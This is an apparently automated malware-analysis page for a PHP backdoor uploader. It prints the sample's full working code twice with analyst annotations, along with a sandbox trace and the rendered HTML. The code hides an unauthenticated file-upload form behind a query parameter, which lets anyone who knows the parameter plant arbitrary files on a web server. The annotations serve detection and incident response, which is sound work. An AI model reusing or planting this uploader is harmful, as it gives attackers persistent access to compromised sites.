PHP Malware Analysis

hidenuplodmnh.phtml

md5: 53a5417532e74942175f0809398174b1



Deobfuscated PHP code

<?php

// Analyst notes (review annotations; not part of the sample).
// What this is: a minimal file uploader with no authentication. A plain
// request returns only the hidden form echoed below, so the page renders blank.
// On this page the trace records only {main} and the generated HTML holds only
// that hidden form, which is consistent with the sandbox requesting the file
// without `x`; the upload branch was not exercised dynamically.
echo "\n<style>\n.none{\n\tdisplay:none;\n}\n</style>\n<form method=\"get\">\n<input type=\"submit\" name=\"x\" class=\"none\">\n</form>";
// Gate: everything below runs only when the query parameter `x` is truthy.
// This is concealment, not access control: no secret, session or origin is
// checked, so anyone who knows the parameter name reaches the uploader.
if ($_GET['x']) {
    // Upload handler: runs when the request also carries POST field `btn`
    // (the submit button of the form echoed further down).
    if (isset($_POST['btn'])) {
        // "nama" (Indonesian: name) is the filename sent by the client and is
        // used as the destination name unchanged. No extension, content-type
        // or size check appears anywhere in the script.
        $nama = $_FILES['upl']['name'];
        // "lokasi" (Indonesian: location) is PHP's temporary upload path.
        $lokasi = $_FILES['upl']['tmp_name'];
        // Empty prefix: the destination is a bare relative filename.
        // Presumably that resolves to the directory this script sits in
        // (depends on the SAPI's working directory; confirm on the host).
        $folder = "";
        // Impact: a file with a client-chosen name and extension is written
        // next to the script, so a server-executable file can be planted.
        if (move_uploaded_file($lokasi, $folder . $nama)) {
            // Indonesian: "file uploaded successfully".
            echo "berhasil upload file :)";
        } else {
            // Indonesian: "file upload failed".
            echo "gagal upload file :";
        }
    }
    // Uploader UI. Stable strings usable as content signatures:
    //   "Uploader Script By Codename", "<title>Uploader MnH-Blog</title>",
    //   "#~Magelang1337.com~#", "width=width-device" (typo kept by the author),
    //   "<!-- INI CSS :) -->" (Indonesian: "this is CSS").
    // Markup artifacts that may help cluster related samples: a closing </div>
    // with no opening <div>, and a #kolom CSS rule with no matching element.
    // A browser rendering this page fetches the favicon URL and the Google
    // Fonts stylesheet. Both are hotlinked third-party resources; the hotlink
    // alone does not indicate those sites are involved.
    // Log pattern: the form uses action="", so the multipart POST goes to the
    // same URL as the GET that carried `x`. When scoping an incident, review
    // files created in this directory after the script's own timestamp.
    echo "\n<!-- Uploader Script By Codename -->\n<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n<meta name=\"keywords\" content=\"Codename\">\n<meta name=\"viewport\" content=\"width=width-device,initial-scale=1\">\n<link rel=\"icon\" href=\"https://blog.rootshell.be/wp-content/uploads/2012/02/blackhat-nl.png\">\n<title>Uploader MnH-Blog</title>\n</head>\n<body>\n <link href=\"https://fonts.googleapis.com/css?family=Trade+Winds\" rel=\"stylesheet\" type=\"text/css\"/>\n<center>\n<br><br><br><br><br><br><br>\n<h1>#~Magelang1337.com~#</h1>\n\n<fieldset><legend> Upload Here </legend>\n<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">\n<input type=\"file\" name=\"upl\"  />\n<button type=\"submit\" name=\"btn\" id=\"btn\">Upload !</button>\n</form></div>\n</fieldset>\n\n<!-- INI CSS :) -->\n<style>\nbody{\n\tbackground:#000;\ntext-align: center;\ncolor:#00FF6D;\n}\n#kolom{\ncolor:#00FF6D;\nbackground: #555;\nborder:1px solid #71FF00;\nWidth:35%;\nHeight:80px;\nfont-family: Trade Winds;\n\n}\n#btn{\ncolor:#000;\nbackground: #00ff6d;\nborder: 0;\nwidth:30%;\nheight:30px;\n}\n#btn:hover{\n\ttransition-duration:0.4s;\n-o-transition-duration:0.4s;\n-moz-transition-duration:0.4s;\n-webkit-transition-duration:0.4s;\nbackground:#000;\nborder:1px solid #00ff7d;\ncolor:#81ff00;\n}\nh1{\nfont-family:Trade Winds;\ncolor:#333;\ntext-shadow:0pt 0pt 10pt #00FF5D,0pt 0pt 20pt #71FF00,0pt 0pt 30pt #00FF6D;\n}\n\n</style>";
}

Execution traces

data/traces/53a5417532e74942175f0809398174b1_trace-1676245349.7038.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:42:55.601597]
1	0	1	0.000197	393608
1	3	0	0.000271	397456	{main}	1		/var/www/html/uploads/hidenuplodmnh.phtml	0	0
1	3	1	0.000315	397456
			0.000350	314296
TRACE END   [2023-02-12 21:42:55.601794]


Generated HTML code

<html><head><style>
.none{
	display:none;
}
</style>
</head><body><form method="get">
<input type="submit" name="x" class="none">
</form></body></html>

Original PHP code

<?php

// Analyst notes (review annotations; not part of the sample, so this listing
// with comments no longer hashes to the md5 shown at the top of the page).
// Stage 1: a hidden GET form. Its only control is a submit input named `x`
// styled display:none, so a plain request renders as an empty page.
echo'
<style>
.none{
	display:none;
}
</style>
<form method="get">
<input type="submit" name="x" class="none">
</form>';
// Stage 2 gate: a truthy query parameter `x`. No credential, token or session
// is checked, so the parameter name is the only thing hiding the uploader.
if($_GET['x']){
// Upload handler: triggered by POST field `btn` plus multipart file field `upl`.
if(isset($_POST['btn']))
{
	// Client-supplied filename becomes the destination name as-is; the script
	// has no extension, content-type or size validation.
	$nama= $_FILES['upl']['name'];
    $lokasi = $_FILES['upl']['tmp_name'];
	// Empty prefix: the target path is just the filename, relative to the
	// working directory (presumably the script's own directory; confirm).
	$folder="";
	// Writes the upload to disk. The status strings below are Indonesian:
	// "berhasil upload file" = upload succeeded, "gagal upload file" = failed.
	if(move_uploaded_file($lokasi,$folder.$nama))
	{
echo'berhasil upload file :)';	}else{
		echo'gagal upload file :';
	}
}
// Uploader UI, emitted on every gated request (also after an upload attempt).
// Content signatures: "Uploader Script By Codename", "Uploader MnH-Blog",
// "#~Magelang1337.com~#", "width=width-device", "<!-- INI CSS :) -->".
// The favicon and font links are hotlinked third-party resources fetched by
// the visitor's browser; they are not proof those hosts are involved.
// The form uses action="", so the upload POST targets the same URL as the
// gated GET; that GET-then-POST pair is the pattern to look for in access logs.
echo'
<!-- Uploader Script By Codename -->
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Codename">
<meta name="viewport" content="width=width-device,initial-scale=1">
<link rel="icon" href="https://blog.rootshell.be/wp-content/uploads/2012/02/blackhat-nl.png">
<title>Uploader MnH-Blog</title>
</head>
<body>
 <link href="https://fonts.googleapis.com/css?family=Trade+Winds" rel="stylesheet" type="text/css"/>
<center>
<br><br><br><br><br><br><br>
<h1>#~Magelang1337.com~#</h1>

<fieldset><legend> Upload Here </legend>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="upl"  />
<button type="submit" name="btn" id="btn">Upload !</button>
</form></div>
</fieldset>

<!-- INI CSS :) -->
<style>
body{
	background:#000;
text-align: center;
color:#00FF6D;
}
#kolom{
color:#00FF6D;
background: #555;
border:1px solid #71FF00;
Width:35%;
Height:80px;
font-family: Trade Winds;

}
#btn{
color:#000;
background: #00ff6d;
border: 0;
width:30%;
height:30px;
}
#btn:hover{
	transition-duration:0.4s;
-o-transition-duration:0.4s;
-moz-transition-duration:0.4s;
-webkit-transition-duration:0.4s;
background:#000;
border:1px solid #00ff7d;
color:#81ff00;
}
h1{
font-family:Trade Winds;
color:#333;
text-shadow:0pt 0pt 10pt #00FF5D,0pt 0pt 20pt #71FF00,0pt 0pt 30pt #00FF6D;
}

</style>';
}

?>